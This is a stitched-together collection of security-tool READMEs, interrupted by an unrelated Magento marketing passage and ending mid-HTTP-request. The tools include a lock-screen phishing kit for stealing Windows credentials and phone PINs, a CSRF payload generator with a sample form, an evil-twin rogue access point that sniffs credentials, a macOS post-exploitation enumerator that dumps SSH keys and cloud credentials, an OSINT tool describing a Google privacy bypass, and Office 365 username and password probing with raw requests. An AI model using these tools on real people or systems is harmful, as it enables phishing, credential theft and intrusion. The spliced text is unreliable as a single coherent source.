This script was to developed to capturescreenshot during pentest engagment and OSCP.

IMPORTANT: The screenshot feature is no longer allowed for exam but the terminal logging is allowed for exam.

If you like the tool and for my personal motivation so as to develop other tools please a +1 star *

The tool can be used by pentesters, CTF players, students and trolls :).

**WARNING: SCREEN_KILLER is part of the KILLER project. SCREEN_KILLER is still under development and there might be some issues, please create an issue if you found any. **

Other tool will be added to the KILLER project in the coming months so stay tuned up. Also ideas, bug reports, contributions are more than welcome !

SCREEN_KILLER is a tool that can to take screenshot for a self-defined period (seconds) and also to log all terminal commands.

This means that you can take track of all commands run for whatever number of terminals you have.

• Important: The tool for now is dev for only bash terminal. Will not work on ZSH,CSH...for now (if interested drop an issue).

• Automated screen capture
• Commands logging

Requirement: scrot must be installed (apt-get install scrot). Remember to chmod +x all .sh for execute right.

./screen_killer.sh

It is recommended to run the tool as root but you can sudo ./screen_killer.sh .It should work but I have not tested all the features.

Then choose the feature that you want to run. It is important to stop the capturing at the end of the day.

• Don't forget to stop capturing when you are done!

Video 1: Demo - Terminal Logging

Video 2: Demo - Screenshot

The usual disclaimer applies, especially the fact that me (TH3xACE) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of the script is not my responsibility.

kube-score is a tool that performs static code analysis of your Kubernetes object definitions.

The output is a list of recommendations of what you can improve to make your application more secure and resilient.

You can test kube-score out in the browser with the online demo (source).

kube-score is easy to install, and is available from the following sources:

For a full list of checks, see README_CHECKS.md.

• Container limits (should be set)
• Pod is targeted by a NetworkPolicy, both egress and ingress rules are recommended
• Deployments and StatefulSets should have a PodDisruptionPolicy
• Deployments and StatefulSets should have host PodAntiAffinity configured
• Container probes, a readiness should be configured, and should not be identical to the liveness probe. Read more in README_PROBES.md.
• Container securityContext, run as high number user/group, do not run as root or with privileged root fs
• Stable APIs, use a stable API if available (supported: Deployments, StatefulSets, DaemonSet)

kube-score can run in your CI/CD environment and will exit with exit code 1 if a critical error has been found. The trigger level can be changed to warning with the --exit-one-on-warning argument.

The input to kube-score should be all applications that you deploy to the same namespace for the best result.

helm template my-app | kube-score score -

kustomize build . | kube-score score -

kube-score score my-app/*.yaml

kube-score score my-app/deployment.yaml my-app/service.yaml

kubectl api-resources --verbs=list --namespaced -o name \
  | xargs -n1 -I{} bash -c "kubectl get {} --all-namespaces -oyaml && echo ---" \
  | kube-score score -

docker run -v $(pwd):/project zegl/kube-score:v1.7.0 score my-app/*.yaml

Usage of kube-score:
kube-score [action] --flags

Actions:
	score	Checks all files in the input, and gives them a score and recommendations
	list	Prints a CSV list of all available score checks
	version	Print the version of kube-score
	help	Print this message

Flags for score:
      --disable-ignore-checks-annotations   Set to true to disable the effect of the 'kube-score/ignore' annotations
      --enable-optional-test strings        Enable an optional test, can be set multiple times
      --exit-one-on-warning                 Exit with code 1 in case of warnings
      --help                                Print help
      --ignore-container-cpu-limit          Disables the requirement of setting a container CPU limit
      --ignore-container-memory-limit       Disables the requirement of setting a container memory limi   t
      --ignore-test strings                 Disable a test, can be set multiple times
      --kubernetes-version string           Setting the kubernetes-version will affect the checks ran against the manifests. Set this to the version of Kubernetes that you're using in production for the best results. (default "v1.18")
  -o, --output-format string                Set to 'human', 'json' or 'ci'. If set to ci, kube-score will output the program in a format that is easier to parse by other programs. (default "human")
      --output-version string               Changes the version of the --output-format. The 'json' format has version 'v2' (default) and 'v1' (deprecated, will be removed in v1.7.0). The 'human' and 'ci' formats has only version 'v1' (default). If not explicitly set, the default version for that particular output format will be used.
  -v, --verbose count                       Enable verbose output, can be set multiple times for increased verbosity.

Tests can be ignored in the whole run of the program, with the --ignore-test flag.

A test can also be ignored on a per-object basis, by adding the annotation kube-score/ignore to the object. The value should be a comma separated string of the test IDs.

Example:

Testing this object will temporarily disable the service-type test, which warns against using services of type NodePort.

apiVersion: v1
kind: Service
metadata:
  name: node-port-service-with-ignore
  namespace: foospace
  annotations:
    kube-score/ignore: service-type
spec:
  selector:
    app: my-app
  ports:
  - protocol: TCP
    port: 80
    targetPort: 8080
  type: NodePort

kube-score requires Go1.11 or later to build. Clone this repository, and then:

# Build the project
go build github.com/zegl/kube-score/cmd/kube-score

# Run all tests
go test -v github.com/zegl/kube-score/...

IoTMap is a tool that models IoT networks using one or multiple protocols simultaneously. This is work in progress, as a part of a PhD thesis on Internet Of Things security. This repository is regularly updated as new results are obtained. This project supports 3 protocol as this time : BLE, ZigBee and OS4I. More are coming.

• Python > 3.5
• Scapy (Can be installed through the requirements file but building from the latest source is recommended)
• neo4j-1.7.6
• docopt-0.6.2
• prompt-toolkit-3.0.5
• terminaltables-3.1.0
• pycryptodomex-3.9.7

You can use the requirements.txt file to install the packages:

pip3 install -r requirements.txt

• libgcrypt20-dev (Needed for sniffing capabilities through KillerBee) Depending on the system you used (debian-based OS, archlinux-based OS) you can use:

sudo apt-get install libgcrypt20-dev # (debian-based distribs)
sudo pacman -S libgcrypt             # (archlinux-based distribs)

Clone this repo and install all requirements described above:

# For any distrib
git clone https://github.com/AlgoSecure/iotmap.git
cd iotmap
sudo pip install -r requirements.txt

# If debian-based
sudo apt-get install libgcrypt20-dev

# If archlinux-based
sudo pacman -S libgcrypt

Now we gonna install Neo4J. Most distributions ships Neo4J through the built-in package manager. However, it may be simpler to install and use it from the tarball:

cd /path/to/iotmap
cd database

# Replace the version number with the latest in the URL if necessary
wget -O neo4j-community.tar "https://neo4j.com/artifact.php?name=neo4j-community-3.5.9-unix.tar.gz"
mkdir neo4j-community && tar xvf neo4j-community.tar -C neo4j-community --strip-components 1

For the first run of the project, you need to define a username and a password for the database. Start the database with the following:

cd database
./neo4j-community/bin/neo4j console

Neo4J will start and is accessible at http://localhost:7474. Default username and password are neo4j and neo4j respectively. Iotmap uses the default username and iotmap for password.

If you want to set different credentials, you must update the values in core/databaseController.py at line 46 as follows:

model = Model("bolt:http://localhost:7474", "username", "password")

A more detailed documentation on how to use IoTMap with an example is available here

Start the framework:

python3 iotmap.py

IoTMap will start the neo4j database before running, however the database is not immediately available. Sometimes the sleep of 10 seconds is enough for the database to be available, sometimes not and you need to rerun iotmap.

IoTMap provides 3 modules: Database, Modelling and Sniffing. The sniffing module is a work in progress and not fully operational. To switch between modules, simply type the name of the module.

python3 iotmap.py
Starting the database
Database is available at http://localhost:7474/



IIIIIIIIII              TTTTTTTTTTTTTTTTTTTTTTTMMMMMMMM               MMMMMMMM
I::::::::I              T:::::::::::::::::::::TM:::::::M             M:::::::M
I::::::::I              T:::::::::::::::::::::TM::::::::M           M::::::::M
II::::::II              T:::::TT:::::::TT:::::TM:::::::::M         M:::::::::M
  I::::I     oooooooooooTTTTTT  T:::::T  TTTTTTM::::::::::M       M::::::::::M  aaaaaaaaaaaaa  ppppp   ppppppppp
  I::::I   oo:::::::::::oo      T:::::T        M:::::::::::M     M:::::::::::M  a::::::::::::a p::::ppp:::::::::p
  I::::I  o:::::::::::::::o     T:::::T        M:::::::M::::M   M::::M:::::::M  aaaaaaaaa:::::ap:::::::::::::::::p
  I::::I  o:::::ooooo:::::o     T:::::T        M::::::M M::::M M::::M M::::::M           a::::app::::::ppppp::::::p
  I::::I  o::::o     o::::o     T:::::T        M::::::M  M::::M:::   :M  M::::::M    aaaaaaa:::::a p:::::p     p:::::p
  I::::I  o::::o     o::::o     T:::::T        M::::::M   M:::::::M   M::::::M  aa::::::::::::a p:::::p     p:::::p
  I::::I  o::::o     o::::o     T:::::T        M::::::M    M:::::M    M::::::M a::::aaaa::::::a p:::::p     p:::::p
  I::::I  o::::o     o::::o     T:::::T        M::::::M     MMMMM     M::::::Ma::::a    a:::::a p:::::p    p::::::p
II::::::IIo:::::ooooo:::::o   TT:::::::TT      M::::::M               M::::::Ma::::a    a:::::a p:::::ppppp:::::::p
I::::::::Io:::::::::::::::o   T:::::::::T      M::::::M               M::::::Ma:::::aaaa::::::a p::::::::::::::::p
I::::::::I oo:::::::::::oo    T:::::::::T      M::::::M               M::::::M a::::::::::aa:::ap::::::::::::::pp
IIIIIIIIII   ooooooooooo      TTTTTTTTTTT      MMMMMMMM               MMMMMMMM  aaaaaaaaaa  aaaap::::::pppppppp
                                                                                                p:::::p
                                                                                                   p:::::p
                                                                                               p:::::::p
                                                                                               p:::::::p
                                                                                               p:::::::p
                                                                                               ppppppppp


                                Version=0.1

IoTMap > help

Core commands
=============

 Commands  Description
------------------------------
 database  Use database mode.
 sniffing  Use sniffing mode.
 exploit   Use exploit mode.


IoTMap >

Each module and functions provide a help menu to list the functions available and how to use them.

This module manages and interacts with the neo4j database.

IoTMap > database
IoTMap database > help

Core commands
=============

 Commands  Description
------------------------------
 database  Use database mode.
 sniffing  Use sniffing mode.
 exploit   Use exploit mode.


Database commands
=================

        Interact with the neo4j database.

List of available commands :
        addNodes
        clearDatabase
        exportDB
        getNodes
        help
        importDB
        importPcaps
        mergeNodes
        removeNode

For more information about any commands hit :
<command name> -h

IoTMap database > 

To populate the database you can import an existing database or Pcaps files. ImportPcaps converts Pcaps to our unified format used to generate the modelling. This module uses different extractors according to the protocol given in argument that you can find in the extractors folder. The main program chooses the appropriate extractor then runs the packets generator (gen_packets.py) in a multithreading way to generate the pcap with the unified format.

IoTMap modelling > help

Core commands
=============

 Commands  Description
------------------------------
 database  Use database mode.
 sniffing  Use sniffing mode.
 exploit   Use exploit mode.


Modelling commands
==================

        Map the network of IoT devices detected by sniffing.

List of available commands :
        appGraph
        compareTo
        dlGraph
        help
        nwkGraph
        option
        run
        set
        transGraph

For more information about any commands hit :
<command name> -h

IoTMap modelling >                   

This program starts the Neo4J database before creating the modelling. Once the database is up, the modelling begins. It starts with the analysis of the pcap given in input to extract and create nodes then edges that link nodes. After the 4 graphs created, the result can be viewed on the web application provided by Neo4J available at http://localhost:7474/

You can also request the database directly from the web application by using cypher request in the input box.

Lockphish it's the first tool (07/04/2020) for phishing attacks on the lock screen, designed to grab Windows credentials, Android PIN and iPhone Passcode using a https link.

• Lockscreen phishing page for Windows, Android and iPhone
• Auto detect device
• Port Forwarding by Ngrok
• IP Tracker

Usage of Lockphish for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

git clone https://github.com/kali-linux-tutorial/lockphish
cd lockphish
bash lockphish.sh

This is a great phishing tool which you use in your android system al well as pc. Just install Termux and follow the usage command.

The shopping isn't finished once you've purchased your item. If you've ever done shopping online, then you know all about being presented with related items to the one you just purchased. This feature is common for online retail websites and quite useful for both the consumer and the producers. If the user sees products similar to the one they're buying, they could be persuaded into adding it to their cart.

The better the related product extension, the more effective it will be at getting users to add more to their cart. With Magento 2, related products come easy and only the most relevant are presented to users upon check out. The extension they offer will allow you to optimize your website and create the best related product section users will find.

How Does the Related Product Extension Work? 

This extension takes in a ton of information based on a customers' shopping habits. It learns about what the customer is interested in and what products are likely to appeal to the customer based on impressions, clicks, and previous orders. It takes all information it can gather into consideration and compiles the best possible results for the related products page.

The extension also considers what other users who have purchased similar items are looking at. If many users who have purchased the same product are also purchasing another item, the algorithm will place that product on the related options page upon check out. This is the best way for retail websites to double the cart size of every customer.

A Benefit For Consumers and Producers Alike

Everyone wins with the related products' extension. For you, the better the related products section, the more likely a user is to add the suggestions to their cart upon check out. The more often you're able to double the cart size of users, the more money you stand to make. If users like what they're being offered, then they're likely to come back for more later on.

For consumers, having products that pertain to your interests and are similar or go well with whatever is currently in your cart will make shopping easier. The products that matter most to you will come to you, rather than you having to go to them. The better the related product algorithm, the more appealing the options are to you.

Using the Smart Algorithm

The smart algorithm featured in this Magento 2 extension is the best way to capture the attention of your customers. Online shopping has been set up to be fast-paced and go getting. If the customer's eye isn't caught instantly, then chances are they won't go for a second glance. The smart algorithm makes the most out of every second the consumer is on your website.

It takes in every bit of information it can gather and uses it to present the most likely to be added options for the customer. With the smart algorithm, your user will only find the best products in their related section.

GHunt is an OSINT tool to extract a lot of informations of someone's Google Account email.

It can currently extract :

• Owner's name
• Last time the profile was edited
• Google ID
• If the account is an Hangouts Bot
• Activated Google services (Youtube, Photos, Maps, News360, Hangouts, etc.)
• Possible Youtube channel
• Possible other usernames
• Public photos
• Phones models
• Phones firmwares
• Installed softwares
• Google Maps reviews
• Possible physical location

• 02/10/2020 : Since few days ago, Google return a 404 when we try to access someone's Google Photos public albums, we can only access it if we have a link of one of his albums.
  Either this is a bug and this will be fixed, either it's a protection that we need to find how to bypass.
  So, currently, the photos & metadata module will always return "No albums" even if there is one.
• 02/10/2020 : I found a bypass, I'm working on the patch right now.
• 03/10/2020 : Successfully bypassed.
  
  (commit 01dc016)

• Python 3.6.1+ would be ok. (I developed it with Python 3.8.1)
• These Python modules are required (we'll install them after):

geopy
httpx
selenium-wire
selenium
imagehash
pillow
python-dateutil

This project uses Selenium, so you'll need to download the chromedriver here : https://chromedriver.chromium.org/downloads
And put it in the GHunt folder. Be sure it's called "chromedriver.exe" or "chromedriver".
Also, be sure to have Google Chrome installed.

In the GHunt folder, do this:

python -m pip install -r requirements.txt

Adapt the command with your operating system if needed.

For the first usage and sometimes after, you'll need to check the validity of your cookies.
To do this, launch check_and_gen.py.
If you don't have cookies stored (ex: first launch) it will ask you the 4 needed cookies, enter them and if they are valid, it will generate the Authentification token, and the Google Docs & Hangouts tokens.

Then, you can run the tool like this :

python hunt.py myemail@gmail.com

1. Login to accounts.google.com
2. Once connected, open the Dev Tools window and goes to the Storage tab (Shift + F9 on Firefox) (looks like it's called "Application" on Chrome)
   If you don't know how to open it, just right-click somewhere and "Inspect Element"
3. Then you'll find every cookie you need, including the 4 ones.

This tool is based on the Sector's researches on the Google IDs : https://sector035.nl/articles/getting-a-grasp-on-google-ids
And completed by my own researches.
If I have the motivation to write a blog post about it, I'll add the link here!

CSRFER is a tool to generate csrf payloads, based on vulnerable requests.

It parses supplied requests to generate either a form or a fetch request. The payload can then be embedded in an html template.

 _____  _________________ ___________ 
/  __ \/  ___| ___ \  ___|  ___| ___ \
| /  \/\ `--.| |_/ / |_  | |__ | |_/ /
| |     `--. \    /|  _| |  __||    / 
| \__/\/\__/ / |\ \| |   | |___| |\ \ 
 \____/\____/\_| \_\_|   \____/\_| \_|

          -.--.
          )  " '-,
          ',' 2  \_
           \q \ .  \
        _.--'  '----.__
       /  ._      _.__ \__
    _.'_.'  \_ .-._\_ '-, }
   (,/ _.---;-(  . \ \   ~
 ____ (  .___\_\  \/_/
(      '-._ \   \ |
 '._       ),> _) >
    '-._ c='  Cooo  -._
        '-._           '.
            '-._         `\
       snd      '-._       '.
                    '-._     \
                        `~---'

Usage: csrfer [options]

Options:
  --version              Show version number
  -r, --request          Path to the request file to be used
  -m, --mode             Mode to generate the code. Available options: form, fetch. (Default is form)
  -a, --autosubmit       Auto submit the request on page load
  -s, --show             Show the form inputs (only for form mode)
  -o, --output           Output the payload to the specified file instead of STDOUT
  -t, --template         Path to an html template page. Use the placeholder {{CONTENT}} to specify where to
                         inject the code (in html, not JS)
  -T, --defaulttemplate  Use this option if you want the code to be injected into a default html page.
  -h, --help             Show help

Examples:
  csrfer -r req.txt -m form -a                    Automatically submit a form request
  csrfer -r req.txt -m form -s                    Generate and shows a form to be submitted manually
  csrfer -r req.txt -m fetch -t my_template.html  Generates a fetch request and uses the supplied template
                                                  page

<!DOCTYPE html>
<html>

<head>
<title>This is Hello World page</title>
</head>

<body>
<h1>Hello World</h1>

<form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
    enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
      value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50&#x20AC;' /><br><input
      type='submit' value='submit'></form>
</body>

</html>

As indicated by sources like vulndb & cve, on a daily basis, approximately 50 new vulnerabilities become known to industry and it’s safe to assume that count is going to increase furthermore. It’s a huge number of vulnerabilities to assess and remediate effectively and quickly. So today organizations are focusing (or should focus) on reducing the risk rather than eliminating it and vulnerability management is (almost) equal to risk prioritisation and risk is a variable and dynamic concept determined by multiple factors.

Theoretically, the approach of considering factors like base CVSS, asset accessibility, criticality, exploit availability, business sensitivity etc. looks appropriate to adopt but it’s not practically possible to do it manually for every vulnerability affecting every asset by every organisation.

To overcome above challenges, vPrioritizer is designed with primary objectives as below:

1. Centralized - must serve as single-pane-of-glass for vulnerability management
2. Automated - any and every task which can be automated, must be automated
3. Community Analytics - utilization of community analytics to mature the prioritization algorithm over the period of time

Read More…

vPrioritizer gives us ability to assess the risk on different layers such as (and hence comprehensive control on granularity of each of risk as described above in risk calculation section):

• We can assign significance on per asset basis
• We can assess severity on per vulnerability basis
• At the same time, we can adjust both factors at asset & vulnerability relationship level
• On top of that, community analytics provides insights as suggested risk

vPrioritizer enables us to understand the contextualized risk pertaining to each asset by each vulnerability across the organization. It’s community based analytics provides a suggested risk for each vulnerability identified by vulnerability scanners and further strengthens risk prioritization process. So at any point of time teams can make an effective and more informed decision, based on unified and standardized data, about what (vulnerability/ties) they should remediate (or can afford not to) and on which (asset/s).

1. Install docker & docker-compose
   • sudo apt-get update
   • sudo apt-get install docker-ce docker-compose
2. wget https://raw.githubusercontent.com/varchashva/vPrioritizer/master/docker-compose.yml
3. docker-compose up
4. Browse to http://localhost:7777/vp and you are set to explore the tool :)

1. Install postgres
2. Create user and database with below details:
   • Username: vprioritizer
   • Password: vprioritizer
   • Database Name: vprioritizer
3. git clone https://github.com/varchashva/vPrioritizer.git
4. cd vPrioritizer
5. python manage.py runserver 0.0.0.0:7777
6. Browse to http://localhost:7777/vp and you are set to explore the tool :)

• Docker support for all OS (Linux, Mac, Windows)
• Integration with scanners API:
  • Nexpose
  • QualysGuard
  • Nessus
  • Cloud Native Scanner
    • AWS Inspector
    • Azure Security Center
    • GCP Security Command Center
• “Custom Upload Field” module
• Cumulation of vulnerabilities
• Custom “Settings” page
• Maintaining the KB for vulnerabilities
• “Help” for vulnerabilities by OSINT
• Prioritization algorithm maturity (ongoing)

c41n is an automated Rogue Access Point setup tool.

c41n provides automated setup of several types of Rogue Access Points, and Evil Twin attacks. c41n sets up an access point with user defined characteristics (interface, name and channel for the access point), sets up DHCP server for the access point, and provides user with abilities of HTTP traffic sniffing, or Captive Portal setup with credential sniffing.

Installation consists of cloning the repo, running a script that will install dependencies , and making c41n executable. Script only works with apt package manager (Debian based distributions).

# git clone https://github.com/MS-WEB-BN/c41n/
# cd c41n
# sudo bash install.sh
# sudo chmod +x c41n

Dependencies can also be installed manually (without the script) with apt-get package manager (Debian based distributions):

# sudo apt-get install net-tools hostapd dnsmasq tcpflow

c41n can be run in interactive, and quick mode.

To run c41n in interactive mode:

# ./c41n

Quick mode:

Start Rogue AP:

# ./c41n <AP interface> <internet connection interface> <AP name> <AP channel>

Start Rogue AP + sniffing HTTP traffic:

# ./c41n sniff <AP interface> <internet connection interface> <AP name> <AP channel>

Start Rogue AP + captive portal:

# ./c41n captive <ap interface> <internet connection interface> <AP name> <AP channel> <redirection parameter>

Redirection parameter can have the following values:

0: Redirects only predefined domains.
1: Redirects all traffic.
domains_file: Redirects predefined domains + domains from specified file (separated by new line).

Examples:

[1] Start Rogue AP on wlan0 interface, route traffic from eth0 interface, AP name: 'AP', AP channel: '1'

# ./c41n wlan0 eth0 AP 1

[2] Start Rogue AP and sniff HTTP traffic on wlan0 interface, route traffic from wlan1 interface, AP name: 'Access_Point', AP channel: '6'

# ./c41n sniff wlan0 wlan1 Access_Point 6

[3] Start Rogue AP with captive portal on wlp6s0 interface, redirect default domains and domains from custom file (/home/name/Documents/domains.txt), route traffic from eth1 interface, AP name: 'router', AP channel: '9'

# ./c41n captive wlp6s0 eth1 router 9 /home/name/Documents/domains.txt

Any actions and/or activities done by using h4rpy are solely your responsibility. The misuse of h4rpy can result in criminal charges brought against the persons in question. The author will not be held responsible in the event any criminal charges be brought against any individuals misusing h4rpy to break the law.

Each of the scripts/tools/programs hosted here are made as a part of MS-WEBs cyber security courses, aimed toward beginners, therefore are purely educational and/or demonstrational, and are meant to stay that way, even if wider audience and real world usage are reached. All pauses present in code are there so that the user can read the output, so the action that is running is understood.

All pull requests removing such pauses, or parts of output are against the educational purpose, and will not be accepted.

To remove sleeps from c41n use:

sed -i '/sleep/d' ./c41n

SwiftBelt is a macOS enumerator inspired by @harmjoy's Windows-based Seatbelt enumeration tool. SwiftBelt does not utilize any command line utilities and instead uses Swift code (leveraging the Cocoa Framework, Foundation libraries, OSAKit libraries, etc.) to perform system enumeration. This can be leveraged on the offensive side to perform enumeration once you gain access to a macOS host. I intentionally did not include any functions that cause pop-ups (ex: keychain enumeration).

Thanks Ramos04 for contributing code to look for various Objective See tools and mattreduce for contributing code for zshell history as well as azure creds.

Steps

You can run the included SwiftBelt mach-o binary in the root directory of this repo or you can edit the Swift code and rebuild a new binary.

To use the included mach-o:

1. Note: I did not sign the included mach-o. Therefore you will need to take these steps to remove the quarantine attribute in order to run: Once downloaded, copy to the desired host and clear the quarantine attribute ($ xattr -c SwiftBelt) and set as executable ($ chmod +x SwiftBelt)
2. To see the help menu: ./SwiftBelt -h

Help menu:

SwiftBelt Options:

-SecurityTools --> Check for the presence of common macOS security tools (at least the ones I am familiar with)

-SystemInfo --> Pull back system info (wifi SSID info, open directory node info, internal IPs, ssh/aws/gcloud/azure-cli cred info, basic system info). If present on the host, this tool will display the contents of ssh keys, known hosts file, aws cred files, and gcloud token info

-Clipboard --> Dump clipboard contents

-RunningApps --> List all running apps

-ListUsers --> List local user accounts

-LaunchAgents --> List launch agents, launch daemons, and configuration profile files

-BrowserHistory --> Attempt to pull Safari, Firefox, Chrome, and Quarantine history (note as FYI: if Chrome or Firefox is actively running, the tool will not be able to read the locked database to extract info)

-SlackExtract --> Check if Slack is present and if so read cookie, downloads, and workspaces info (leverages research done by Cody Thomas)

-ShellHistory --> Read shell (Bash or Zsh) history content

-Bookmarks --> Read Chrome saved bookmarks

Usage:

To run all options: ./SwiftBelt

To specify certain options: ./SwiftBelt [option1] [option2] [option3]...

Example: ./SwiftBelt -SystemInfo -Clipboard -SecurityTools ...

To edit the Swift code and rebuild your own mach-o:

1. Open the xcodeproj file for SwiftBelt in Xcode

2. Edit the code in main.swift code as needed in Xcode

3. From a terminal cd into the SwiftBelt directory and run: "swift build" to generate the binary. The binary will be dropped in the .build/debug folder inside of the SwiftBelt folder and will be named SwiftBelt

4. Copy to the desired host and clear the quarantine attribute ($ xattr -c SwiftBelt) and set as executable ($ chmod +x SwiftBelt)

5. Execute

Detection

Though this tool does not use any command line utilities (which are easy to detect), this tool does read from several files on the system which can be detected by any tools that leverage the Endpoint Security Framework (these file reads in particular are captured by ES_EVENT_TYPE_NOTIFY_OPEN events within ESF).

Nasha is a Virtual Machine for .NET files and its runtime was made in C++/CLI

git clone https://github.com/Mrakovic-ORG/NashaVM --recurse
cd NashaVM\NashaVM
nuget restore
msbuild

• Slow
• Several instructions are not implemented
• Can bug

• dnlib
• .NET Framework 4.0
• Visual C++ Redistrutable

• Incompatible with Linux based OS

• What is this project for?

This project is made to protect and hide managed opcodes inside a mixed engine to make it harder for reverse engineers to view or tamper your application.

• Will this project be maintened?

Partially yes. It has been published so with the help from the community we can make the project grow and improve.

• Is Nasha a code obfuscator?

No, Nasha is a Instruction Virtual Machine which means it could be interpreted as a obfuscator while it is not. Your code will be protected but not in a similar way.

• How can i contribute?

  • If you have an issue you can open a ticket and we will investigate the issue in question.
  • If you have no programming knowledge but you are willing to support you can donate at bc1qfedg6qty0l8hk8qu9d4akj86mh7yqfwzcjnvn7 (Segwit BTC)
  • If you are willing to make your own project out of this repo, Follow the setup and installation guide and make sure to credit our work or you will be facing Mrak The Murderer all jokes apart since we are licensed by the GNU license it is strictly prohibed to personally this project without disclosing the source.
  • You can also join our Discord server

• Мрак
• 0x11DFE aka Tesla
• Assumer
• All members from the Mrakovic Organization, Wannabe1337, NetShields

• 0xd4d for the awesome work he brings to the .NET community.
• xsilent007 for MemeVM

A proof-of-concept for WebRTC signaling using sound. Works with all devices that have microphone + speakers. Runs in the browser.

Nearby devices negotiate the WebRTC connection by exchanging the necessary Session Description Protocol (SDP) data via a sequence of audio tones. Upon successful negotiation, a local WebRTC connection is established between the browsers allowing data to be exchanged via LAN.

See it in action (2min video):

Try it yourself: ggerganov.github.io/wave-share

The WebRTC technology allows two browsers running on different devices to connect with each other and exchange data. There is no need to install plugins or download applications. To initiate the connection, the peers exchange contact information (ip address, network ports, session id, etc.). This process is called "signaling". The WebRTC specification does not define any standard for signaling - the contact exchange can be achieved by any protocol or technology.

In this project the signaling is performed via sound. The signaling sequence looks like this:

• Peer A broadcasts an offer for a WebRTC connection by encoding the session data into audio tones
• Nearby peer(s) capture the sound emitted by peer A and decode the WebRTC session data
• Peer B, who wants to establish connection with peer A, responds with an audio answer. The answer has peer B's contact information encoded in it. Additionally, peer B starts trying to connect to peer A
• Peer A receives the answer from peer B, decodes the transmitted contact data and allows peer B to connect
• Connection is established

The described signaling sequence does not involve a signaling server. Therefore, an application using signaling through sound can be, for example, served by a static web page. The only requirement is to have control over the audio output/capture devices.

An obvious limitation (feature) of the current approach is that only nearby devices (e.g. within the same room) can establish connection with each other. Moreover, the devices have to be connected in the same local network, because NAT is not available.

The data communicated through sound contains the contact information required to initialize the WebRTC connection. This data is stored in the Session Description Protocol (SDP) format. Since data-over-sound has significant limitations in terms of bandwidth and robustness it is desirable to transmit as few data as possible. Therefore, the SDP is stripped from all irrelevant information and only the essential data needed to establish the connection is transmitted. Currently, the sound packet containing the minimum required SDP data has the following format:

The total size of the audio packet is 112 bytes. With the current audio encoding algorithm, the SDP packet can be transmitted in 5-10 seconds (depending on the Tx protocol used). Using slower protocols provides more reliable transmission in noisy environments or if the communicating devices are far from each other.

The current approach uses a multi-frequency Frequency-Shift Keying (FSK) modulation scheme. The data to be transmitted is first split into 4-bit chunks. At each moment of time, 3 bytes are transmitted using 6 tones - one tone for each 4-bit chunk. The 6 tones are emitted in a 4.5kHz range divided in 96 equally-spaced frequencies:

For all protocols: dF = 46.875 Hz. For non-ultrasonic protocols: F0 = 1875.000 Hz. For ultrasonic protocols: F0 = 15000.000 Hz.

For convenience, a simple WebRTC hack is used to automatically detect the local IP address of your machine, so you don't have to provide it manually. However, the latest WebRTC spec prevents this from being possible for security reasons, so at some point this "feature" will stop working in all browsers. For example, it no longer works on Safari.

You will need an Emscripten compiler. Additionally, you need FFTW built with Emscripten. Run the compile.sh script.

This is a simple tool that receives and sends data using the explained wave-share sound tx/rx protocol. Type some text on the standard input and press Enter to transmit.

# build
git clone https://github.com/ggerganov/wave-share
cd wave-share && mkdir build && cd build
cmake ..
make

# running
./wave-share

Here is a short video demonstrating how to use the CLI tool:

• Does not work with: IE, IE Edge, Chrome/Firefox on iOS, Safari on macOS
• Ultrasonic sound transmission does not work on most devices. Probably hardware limitations?
• In presence of multiple local networks, cannot currently select which one to use. Always the first one is used
• There is occasionally sound cracking during transmission. Need to optimize the Tx code
• The size of the emscripten generated .js is too big (~1MB). Rewrite in pure JS?
• On mobile, using Firefox, the page can remain running in the background even after closing the tab

Enumerate valid usernames from Office 365 using ActiveSync, Autodiscover, or office.com login page.

o365enum will read usernames from the file provided as first parameter. The file should have one username per line. The output is CSV-based for easier parsing. Valid status can be 0 (invalid user), 1 (valid user), 2 (valid user and valid password).

python3.6 o365enum.py -h
usage: o365enum.py [-h] -u USERLIST [-p PASSWORD] [-n NUM] [-v]
                   [-m {activesync,autodiscover,office.com}]

Office365 User Enumeration Script

optional arguments:
  -h, --help            show this help message and exit
  -u USERLIST, --userlist USERLIST
                        username list one per line (default: None)
  -p PASSWORD, --password PASSWORD
                        password to try (default: Password1)
  -n NUM, --num NUM     # of reattempts to remove false negatives (default: 3)
  -v, --verbose         Enable verbose output at urllib level (default: False)
  -m {activesync,autodiscover,office.com}, --method {activesync,autodiscover,office.com}
                        method to use (default: activesync)

Example run:

./o365enum.py -u users.txt -p Password2 -n 1 -m activesync
username,valid
nonexistent@contoso.com,0
existing@contoso.com,1

This method is based on grimhacker's method that sends Basic HTTP authentication requests to ActiveSync endpoint. However, checking the status code no longer works given that Office365 returns a 401 whether the user exists or not.

Instead, we send the same request but check for a custom HTTP response header (X-MailboxGuid) presence to identify whether a username is valid or not.

The request below contains the following Base64 encoded credentials in the Authorization header: valid_user@contoso.com:Password1

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 0
Authorization: Basic dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE=

This elicits the following response ("401 Unauthorized") with the X-MailboxGuid header set, indicating that the username is valid but the password is not:

Date: Fri, 31 Jan 2020 13:02:46 GMT
Connection: close
HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: d494a4bc-3867-436a-93ef-737f9e0522eb
X-CalculatedBETarget: AM0PR09MB2882.eurprd09.prod.outlook.com
X-BackEndHttpStatus: 401
X-RUM-Validated: 1
X-MailboxGuid: aadaf467-cd08-4a23-909b-9702eca5b845 <--- This header leaks the account status (existing)
X-DiagInfo: AM0PR09MB2882
X-BEServer: AM0PR09MB2882
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 401
X-Powered-By: ASP.NET
X-FEServer: AM0PR06CA0096
WWW-Authenticate: Basic Realm="",Negotiate
Date: Fri, 31 Jan 2020 13:02:46 GMT
Connection: close

--snip--

The request below contains the following Base64 encoded credentials in the Authorization header: invalid_user@contoso.com:Password1

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
